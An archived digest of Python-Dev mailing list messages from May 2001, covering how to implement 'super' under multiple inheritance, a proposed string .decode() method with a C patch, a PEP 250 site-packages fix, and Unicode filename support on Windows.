Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From thomas.heller@ion-tof.com  Wed May  2 15:49:02 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:49:02 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook>

> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:
> 
> import new
> 
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
> 
No, it's not the same. Consider:

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

This prints:
test X

test Y
test X

test Y
test Y
(more test Y lines deleted)
RuntimeError: maximum recursion depth exceeded

This is because super(self).test for the Z() object
should start the search in the X class, not in the Y class.
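This diagnosis points at the fix: the search must continue after the class that defines the calling method, not after the bases of the instance's class. A minimal Python 3 sketch of such a proxy (the name Super is hypothetical, and only plain functions are bound), run against the X/Y/Z example with return values instead of prints:

```python
import types


class Super:
    """Hypothetical proxy: look `name` up in type(instance).__mro__,
    starting just after `klass` (the class defining the caller)."""

    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass

    def __getattr__(self, name):
        mro = type(self.instance).__mro__
        for c in mro[mro.index(self.klass) + 1:]:
            if name in c.__dict__:
                member = c.__dict__[name]
                if isinstance(member, types.FunctionType):
                    return types.MethodType(member, self.instance)
                return member
        raise AttributeError(name)


class X:
    def test(self):
        return ["test X"]

class Y(X):
    def test(self):
        return ["test Y"] + Super(self, Y).test()

class Z(Y):
    pass

assert X().test() == ["test X"]
assert Y().test() == ["test Y", "test X"]
assert Z().test() == ["test Y", "test X"]   # no runaway recursion
```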


Thomas


From thomas.heller@ion-tof.com  Wed May  2 15:53:17 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:53:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook>

This implementation of super works correctly:

import new

class super:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass
    def __getattr__(self, name):
        for klass in (self.klass,) + self.klass.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self, X).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

Thomas


From Donald Beaudry <donb@abinitio.com>  Wed May  2 16:31:45 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Wed, 02 May 2001 11:31:45 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105021531.LAA08940@localhost.localdomain>

Guido van Rossum <guido@digicool.com> wrote,
> AFAIK, Smalltalk has only single inheritance, and so does Java, so
> there 'super' is enough.  Will we need to add a "::" operator to
> Python???

Multiple inheritance introduces a potential wrinkle in my definition
of the unbound instance.  The problem is that the search starts one level
too high.  That is in:

    class foo(b1, b2):
          def __repr__(self):
              super = b1._  #this one
              super = b2._  #or this one?
              return super.__repr__(self)

we don't know which base class to choose as the starting point for the
search.  This problem already exists.  Now, if we want to avoid it,
this:

    class foo(b1, b2):
          def __repr__(self):
              super = foo.__super__
              return super.__repr__(self)


comes to mind.
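Python 3's answer to "b1 or b2?" is roughly this foo.__super__ idea: super(foo, self), spelled super() inside the method, starts from foo and follows the linearized MRO of the instance's class, so each base is visited once. A minimal sketch with a hypothetical describe() method standing in for __repr__:

```python
# Illustrative (hypothetical) cooperative hierarchy
class Base:
    def describe(self):
        return ["Base"]

class B1(Base):
    def describe(self):
        return ["B1"] + super().describe()

class B2(Base):
    def describe(self):
        return ["B2"] + super().describe()

class Foo(B1, B2):
    def describe(self):
        # No need to choose between B1 and B2: super() follows Foo.__mro__.
        return ["Foo"] + super().describe()

assert [c.__name__ for c in Foo.__mro__] == ["Foo", "B1", "B2", "Base", "object"]
assert Foo().describe() == ["Foo", "B1", "B2", "Base"]
```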

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                      ...Will hack for sushi...


From Donald Beaudry <donb@abinitio.com>  Wed May  2 16:37:39 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Wed, 02 May 2001 11:37:39 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <200105021537.LAA09063@localhost.localdomain>

"Fredrik Lundh" <fredrik@effbot.org> wrote,
> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:

super is a lexically scoped concept.  You can't ask the instance for it,
since its value differs depending on which class it is needed in.  Just
as:

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__repr__(self)

would get you into an infinite loop, while:

        class foo(bar):
              def __repr__(self):
                  return bar.__repr__(self)

won't.  Now, don't go thinking that

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__bases__[0].__repr__(self)

will do you any good either ;) Because it won't!
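This point is easy to check in Python 3: looking the method up through self.__class__ finds the overriding method again, while naming the base class does not. A minimal sketch with illustrative (hypothetical) classes; the self.__class__ version fails with RecursionError:

```python
# Illustrative (hypothetical) classes
class Bar:
    def __repr__(self):
        return "Bar"

class Looping(Bar):
    def __repr__(self):
        # self.__class__ is Looping, so this calls Looping.__repr__ again.
        return self.__class__.__repr__(self)

class Explicit(Bar):
    def __repr__(self):
        return Bar.__repr__(self)   # lexically names the base: no loop

assert repr(Explicit()) == "Bar"
try:
    repr(Looping())
    looped = False
except RecursionError:
    looped = True
assert looped
```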

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido@digicool.com  Wed May  2 18:02:19 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:02:19 -0500
Subject: [Python-Dev] Unicode and the Windows file system.
In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
 <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com>
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com>
Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com>

> Now that 2.1 is out the door, how do we feel about getting these Unicode
> changes in?
> 
> http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 

No problem for me, although the context-sensitive semantics of the
MBCS encoding still elude me.  (Who cares, it's Windows. :-)

Are you & MAL capable of sorting this out?  Do you want me to add a +1
comment to the tracker?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gmcm@hypernet.com  Wed May  2 17:01:20 2001
From: gmcm@hypernet.com (Gordon McMillan)
Date: Wed, 2 May 2001 12:01:20 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
References: Your message of "Wed, 02 May 2001 14:48:20 +1200."             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>
Message-ID: <3AEFF710.9471.8025D7EA@localhost>

Hmmm.

Some time ago, Tim asked the question: "Why do you want 
this stuff?". As far as I can recall, he got 2 answers: "So I 
don't have to 'initialize(Klass)'" and "me, too". I don't think 
those qualify as answers.

Some time ago (cf, types-sig brouhaha of a couple years ago) 
I concluded that the only purpose for this stuff was __getattr__ 
and __setattr__ hacks. I reached this conclusion by going 
nutzo using (Guido's) metaclass hook, and studying the 
available uses of ExtensionClass (I could find no public usage 
of Don's elegant madness).

I rather liked Guido's "Turtles all the way down" (but his 
description was so cryptic that my interpretation may have 
been a hallucination), and I suspect he's still headed that way.

Nonetheless, I would like to see this discussion of the 
elegance of Smalltalk's incompatible model (and how to fudge 
it in Python) balanced by some discussion of the expected 
pragmatic benefits. (That's a different topic from subclassing 
types.)

start-with-"if-God-wanted-metaclasses-he-wouldn't-have-
invented-proxies"-<wink>-ly y'rs


- Gordon


From fredrik@effbot.org  Wed May  2 16:47:08 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 17:47:08 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid>

Donald Beaudry wrote:
> super is a lexically scoped concept.  You can't ask the instance for it,
> since its value differs depending on which class it is needed in

oh, you want people to be able to inherit from classes
using super?

guess we'll have to use

        sys._getframe().f_back.f_method.im_class

instead, then ;-)

(any special reason why frame objects don't contain a
pointer to the corresponding function/method object?)

Cheers /F


From mal@lemburg.com  Wed May  2 17:11:50 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 18:11:50 +0200
Subject: [Python-Dev] Unicode and the Windows file system.
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> <200105021702.MAA01317@cj20424-a.reston1.va.home.com>
Message-ID: <3AF031C6.324D25D5@lemburg.com>

Guido van Rossum wrote:
> 
> > Now that 2.1 is out the door, how do we feel about getting these Unicode
> > changes in?
> >
> > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470
> 
> No problem for me, although the context-sensitive semantics of the
> MBCS encoding still elude me.  (Who cares, it's Windows. :-)
> 
> Are you & MAL capable of sorting this out?  Do you want me to add a +1
> comment to the tracker?

I'll take care of the parser marker stuff and Mark can do the
rest ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 18:17:50 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:17:50 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200."
 <00a901c0d31f$2797a370$e46940d5@hagrid>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
 <00a901c0d31f$2797a370$e46940d5@hagrid>
Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com>

> (any special reason why frame objects don't contain a
> pointer to the corresponding function/method object?)

Because (until now) there was no need.  The frame needs to know about
the code object, but the rest of the function's context is not needed.
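A small illustration in current CPython 3 (sys._getframe is a CPython implementation detail, and the helper name is hypothetical): a running frame exposes its code object as f_code, the same object the function stores as __code__, which is the only link to the function a frame needs.

```python
import sys


def which_code():
    # The frame executing this function references its code object...
    frame = sys._getframe()
    return frame.f_code


if __name__ == "__main__":
    code = which_code()
    # ...which is the very object stored on the function as __code__.
    print(code is which_code.__code__)   # True
    print(code.co_name)                  # which_code
```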

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 19:13:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:13:17 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
Message-ID: <3AF04E3D.45AE4F4B@lemburg.com>

We already have "data".encode(encoding) which encodes the string data
by passing it through the encoder of the given encoding.

Wouldn't it be worthwhile to add direct access to codec decoders
through string methods as well ?

(Note that this addition only makes sense for string objects,
since Unicode cannot be decoded.)

Also, would there be any objections adding some more standard
codecs to the system ? I'm thinking of wrapping the binascii 
module APIs in form of codecs...
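For comparison, the binascii-as-codec idea can be seen in Python 3, where bytes-to-bytes codecs such as "hex" and "base64" are reached through codecs.encode() and codecs.decode() rather than through string methods (Python 3 restricts str.encode() and bytes.decode() to text encodings). A sketch assuming Python 3.4 or later, where these short aliases are registered:

```python
import binascii
import codecs

payload = b"\x01\xff\x10"

# The "hex" codec is a thin wrapper around binascii's hex conversion.
via_codec = codecs.encode(payload, "hex")
via_binascii = binascii.hexlify(payload)

print(via_codec)                                    # b'01ff10'
print(via_codec == via_binascii)                    # True
print(codecs.decode(via_codec, "hex") == payload)   # True
```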

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 20:18:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:18:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200."
 <3AF04E3D.45AE4F4B@lemburg.com>
References: <3AF04E3D.45AE4F4B@lemburg.com>
Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com>

> We already have "data".encode(encoding) which encodes the string data
> by passing it through the encoder of the given encoding.
> 
> Wouldn't it be worthwhile to add direct access to codec decoders
> through string methods as well ?
> 
> (Note that this addition only makes sense for string objects,
> since Unicode cannot be decoded.)
> 
> Also, would there be any objections adding some more standard
> codecs to the system ? I'm thinking of wrapping the binascii 
> module APIs in form of codecs...

Can you provide examples of where this can't be done using the
existing approach?

Code-bloat police anyone?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 19:32:46 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:32:46 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
Message-ID: <3AF052CE.E928BDA1@lemburg.com>

Guido van Rossum wrote:
> 
> > We already have "data".encode(encoding) which encodes the string data
> > by passing it through the encoder of the given encoding.
> >
> > Wouldn't it be worthwhile to add direct access to codec decoders
> > through string methods as well ?
> >
> > (Note that this addition only makes sense for string objects,
> > since Unicode cannot be decoded.)
> >
> > Also, would there be any objections adding some more standard
> > codecs to the system ? I'm thinking of wrapping the binascii
> > module APIs in form of codecs...
> 
> Can you provide examples of where this can't be done using the
> existing approach?

There is no existing elegant approach except hooking up to the
codecs directly. Adding .decode() is really a matter of adding
symmetry.

Here are some examples of how these two codec methods could
be used:

	xmltext = binarydata.encode('base64')
	...
	binarydata = xmltext.decode('base64')

	zzz = data.encode('gzip')
	...
	data = zzz.decode('gzip')

	jpegimage = gifimage.decode('gif').encode('jpeg')

	mp3audio = wavaudio.decode('wav').encode('mp3')

	etc.

Basically all content transfer encodings can take advantage of
these two methods.

It's not really code bloat, BTW, since the C API is there;
the .decode() method would just expose it.
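The first two examples above have close equivalents in Python 3, sketched here with the module-level codecs.encode() and codecs.decode() functions. Note the assumptions: there is no standard "gzip" codec, so "zlib" (zlib_codec) stands in for it, and the gif/jpeg/wav/mp3 codecs in the examples remain hypothetical.

```python
import codecs

binarydata = bytes(range(8))

# Content transfer encoding: binary -> ASCII-safe bytes and back.
xmltext = codecs.encode(binarydata, "base64")
assert codecs.decode(xmltext, "base64") == binarydata

# Compression as a codec: "zlib" stands in for the proposed "gzip".
data = b"spam " * 100
zzz = codecs.encode(data, "zlib")
assert codecs.decode(zzz, "zlib") == data
print(len(data), "->", len(zzz))
```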

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 20:38:10 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:38:10 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200."
 <3AF052CE.E928BDA1@lemburg.com>
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com>
Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com>

> > Can you provide examples of where this can't be done using the
> > existing approach?
> 
> There is no existing elegant approach except hooking up to the
> codecs directly. Adding .decode() is really a matter of adding
> symmetry.

Yes, but symmetry is good except when it isn't. :-)

> Here are some examples of how these two codec methods could
> be used:
> 
> 	xmltext = binarydata.encode('base64')
> 	...
> 	binarydata = xmltext.decode('base64')
> 
> 	zzz = data.encode('gzip')
> 	...
> 	data = zzz.decode('gzip')
> 
> 	jpegimage = gifimage.decode('gif').encode('jpeg')
> 
> 	mp3audio = wavaudio.decode('wav').encode('mp3')
> 
> 	etc.

How would you do this currently?

> Basically all content transfer encodings can take advantage of
> these two methods.
> 
> It's not really code bloat, BTW, since the C API is there;
> the .decode() method would just expose it.

Show me the patch and I'll decide whether it's code bloat. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@effbot.org  Wed May  2 19:20:24 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 20:20:24 +0200
Subject: [Python-Dev] PEP 250 buglet
Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid>

PEP 250 suggests changing the sitedirs setup in site.py from

    sitedirs = [prefix]

to

    sitedirs == [makepath(prefix, "lib", "site-packages")]

on windows. it then goes on to say that

    This change does not preclude packages using the current
    location -- the change only adds a directory to sys.path, it
    does not remove anything.

this isn't true (even after correcting the typo), since the
sitedirs list isn't only added to the path; it's also used to
look for PTH files.  after this change, PTH files located under
prefix will no longer be found.

the following change works a bit better:

    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]
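A minimal sketch of why the list matters, assuming, as described above, that site.py looks for PTH files only in the directories named in sitedirs. The helper find_pth_files and the temporary layout are hypothetical stand-ins for site.py's own logic, and os.path.join replaces site.py's makepath:

```python
import os
import tempfile


def find_pth_files(sitedirs):
    """Return the names of .pth files found directly in the given dirs."""
    found = []
    for d in sitedirs:
        if os.path.isdir(d):
            found.extend(n for n in os.listdir(d) if n.endswith(".pth"))
    return sorted(found)


with tempfile.TemporaryDirectory() as prefix:
    site_packages = os.path.join(prefix, "lib", "site-packages")
    os.makedirs(site_packages)
    # One .pth file in the old location, one in the new location.
    open(os.path.join(prefix, "old.pth"), "w").close()
    open(os.path.join(site_packages, "new.pth"), "w").close()

    current = find_pth_files([prefix])
    pep250 = find_pth_files([site_packages])
    both = find_pth_files([prefix, site_packages])

print(current)  # ['old.pth']
print(pep250)   # ['new.pth']  (old.pth is no longer seen)
print(both)     # ['new.pth', 'old.pth']
```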

Cheers /F


From mal@lemburg.com  Wed May  2 20:55:25 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 21:55:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
Message-ID: <3AF0662D.48671B4E@lemburg.com>

This is a multi-part message in MIME format.
--------------891C60CC0A920DAE275D45C5
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Guido van Rossum wrote:
> 
> > > Can you provide examples of where this can't be done using the
> > > existing approach?
> >
> > There is no existing elegant approach except hooking up to the
> > codecs directly. Adding .decode() is really a matter of adding
> > symmetry.
> 
> Yes, but symmetry is good except when it isn't. :-)
> 
> > Here are some examples of how these two codec methods could
> > be used:
> >
> >       xmltext = binarydata.encode('base64')
> >       ...
> >       binarydata = xmltext.decode('base64')
> >
> >       zzz = data.encode('gzip')
> >       ...
> >       data = zzz.decode('gzip')
> >
> >       jpegimage = gifimage.decode('gif').encode('jpeg')
> >
> >       mp3audio = wavaudio.decode('wav').encode('mp3')
> >
> >       etc.
> 
> How would you do this currently?

By looking up the codecs using the codec registry and
then calling them directly.
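What looking up a codec in the registry and calling it directly amounts to, sketched in Python 3 (an assumption: the 2.1 registry returned a plain (encoder, decoder, reader, writer) tuple, as getregentry() in the ROT13 codec later in this thread does, rather than the CodecInfo object used here). The stateless encoder and decoder each return an (output, length consumed) pair:

```python
import codecs

info = codecs.lookup("base64")          # CodecInfo for base64_codec
encoded, consumed = info.encode(b"hello")
decoded, _ = info.decode(encoded)

print(encoded, consumed)   # b'aGVsbG8=\n' 5
print(decoded)             # b'hello'
```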
 
> > Basically all content transfer encodings can take advantage of
> > these two methods.
> >
> > It's not really code bloat, BTW, since the C API is there;
> > the .decode() method would just expose it.
> 
> Show me the patch and I'll decide whether it's code bloat. :-)

I've attached the patch. Due to a small reorganisation the
patch is a little longer -- symmetry has its price at C level
too ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
--------------891C60CC0A920DAE275D45C5
Content-Type: text/plain; charset=us-ascii;
 name="string.decode.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="string.decode.patch"

--- CVS-Python/Include/stringobject.h	Sat Feb 24 10:30:49 2001
+++ Dev-Python/Include/stringobject.h	Wed May  2 21:05:12 2001
@@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE
     PyObject *str,	 	/* string object */
     const char *encoding,	/* encoding */
     const char *errors		/* error handling */
     );
 
+/* Decodes a string object and returns the result as Python string
+   object. */
+
+extern DL_IMPORT(PyObject*) PyString_AsDecodedString(
+    PyObject *str,	 	/* string object */
+    const char *encoding,	/* encoding */
+    const char *errors		/* error handling */
+    );
+
 /* Provides access to the internal data buffer and size of a string
    object or the default encoded version of an Unicode object. Passing
    NULL as *len parameter will force the string buffer to be
    0-terminated (passing a string with embedded NULL characters will
    cause an exception).  */
--- CVS-Python/Objects/stringobject.c	Wed May  2 16:19:22 2001
+++ Dev-Python/Objects/stringobject.c	Wed May  2 21:04:34 2001
@@ -138,42 +138,56 @@ PyString_FromString(const char *str)
 PyObject *PyString_Decode(const char *s,
 			  int size,
 			  const char *encoding,
 			  const char *errors)
 {
-    PyObject *buffer = NULL, *str;
+    PyObject *v, *str;
+
+    str = PyString_FromStringAndSize(s, size);
+    if (str == NULL)
+	return NULL;
+    v = PyString_AsDecodedString(str, encoding, errors);
+    Py_DECREF(str);
+    return v;
+}
+
+PyObject *PyString_AsDecodedString(PyObject *str,
+				   const char *encoding,
+				   const char *errors)
+{
+    PyObject *v;
+
+    if (!PyString_Check(str)) {
+        PyErr_BadArgument();
+        goto onError;
+    }
 
     if (encoding == NULL)
 	encoding = PyUnicode_GetDefaultEncoding();
 
     /* Decode via the codec registry */
-    buffer = PyBuffer_FromMemory((void *)s, size);
-    if (buffer == NULL)
-        goto onError;
-    str = PyCodec_Decode(buffer, encoding, errors);
-    if (str == NULL)
+    v = PyCodec_Decode(str, encoding, errors);
+    if (v == NULL)
         goto onError;
     /* Convert Unicode to a string using the default encoding */
-    if (PyUnicode_Check(str)) {
-	PyObject *temp = str;
-	str = PyUnicode_AsEncodedString(str, NULL, NULL);
+    if (PyUnicode_Check(v)) {
+	PyObject *temp = v;
+	v = PyUnicode_AsEncodedString(v, NULL, NULL);
 	Py_DECREF(temp);
-	if (str == NULL)
+	if (v == NULL)
 	    goto onError;
     }
-    if (!PyString_Check(str)) {
+    if (!PyString_Check(v)) {
         PyErr_Format(PyExc_TypeError,
                      "decoder did not return a string object (type=%.400s)",
-                     str->ob_type->tp_name);
-        Py_DECREF(str);
+                     v->ob_type->tp_name);
+        Py_DECREF(v);
         goto onError;
     }
-    Py_DECREF(buffer);
-    return str;
+    return v;
 
  onError:
-    Py_XDECREF(buffer);
     return NULL;
 }
 
 PyObject *PyString_Encode(const char *s,
 			  int size,
@@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb
         return NULL;
     return PyString_AsEncodedString((PyObject *)self, encoding, errors);
 }
 
 
+static char decode__doc__[] =
+"S.decode([encoding[,errors]]) -> string\n\
+\n\
+Return a decoded string version of S. Default encoding is the current\n\
+default string encoding. errors may be given to set a different error\n\
+handling scheme. Default is 'strict' meaning that encoding errors raise\n\
+a ValueError. Other possible values are 'ignore' and 'replace'.";
+
+static PyObject *
+string_decode(PyStringObject *self, PyObject *args)
+{
+    char *encoding = NULL;
+    char *errors = NULL;
+    if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors))
+        return NULL;
+    return PyString_AsDecodedString((PyObject *)self, encoding, errors);
+}
+
+
 static char expandtabs__doc__[] =
 "S.expandtabs([tabsize]) -> string\n\
 \n\
 Return a copy of S where all tab characters are expanded using spaces.\n\
 If tabsize is not given, a tab size of 8 characters is assumed.";
@@ -2347,10 +2373,11 @@ string_methods[] = {
 	{"title",       (PyCFunction)string_title,       1, title__doc__},
 	{"ljust",       (PyCFunction)string_ljust,       1, ljust__doc__},
 	{"rjust",       (PyCFunction)string_rjust,       1, rjust__doc__},
 	{"center",      (PyCFunction)string_center,      1, center__doc__},
 	{"encode",      (PyCFunction)string_encode,      1, encode__doc__},
+	{"decode",      (PyCFunction)string_decode,      1, decode__doc__},
 	{"expandtabs",  (PyCFunction)string_expandtabs,  1, expandtabs__doc__},
 	{"splitlines",  (PyCFunction)string_splitlines,  1, splitlines__doc__},
 #if 0
 	{"zfill",       (PyCFunction)string_zfill,       1, zfill__doc__},
 #endif

--------------891C60CC0A920DAE275D45C5--


From mal@lemburg.com  Wed May  2 21:36:30 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 22:36:30 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AF06FCE.854D4DF7@lemburg.com>

This is a multi-part message in MIME format.
--------------5800C85BDAA2AC1AD23ED42E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's a little fun codec to play with. It encodes the input
using the ROT13 encoding (which is 1-1 and its own inverse). The
main difference from the existing codecs is that it returns
a string rather than Unicode.

To install it, simply place it in some directory on your Python 
path.

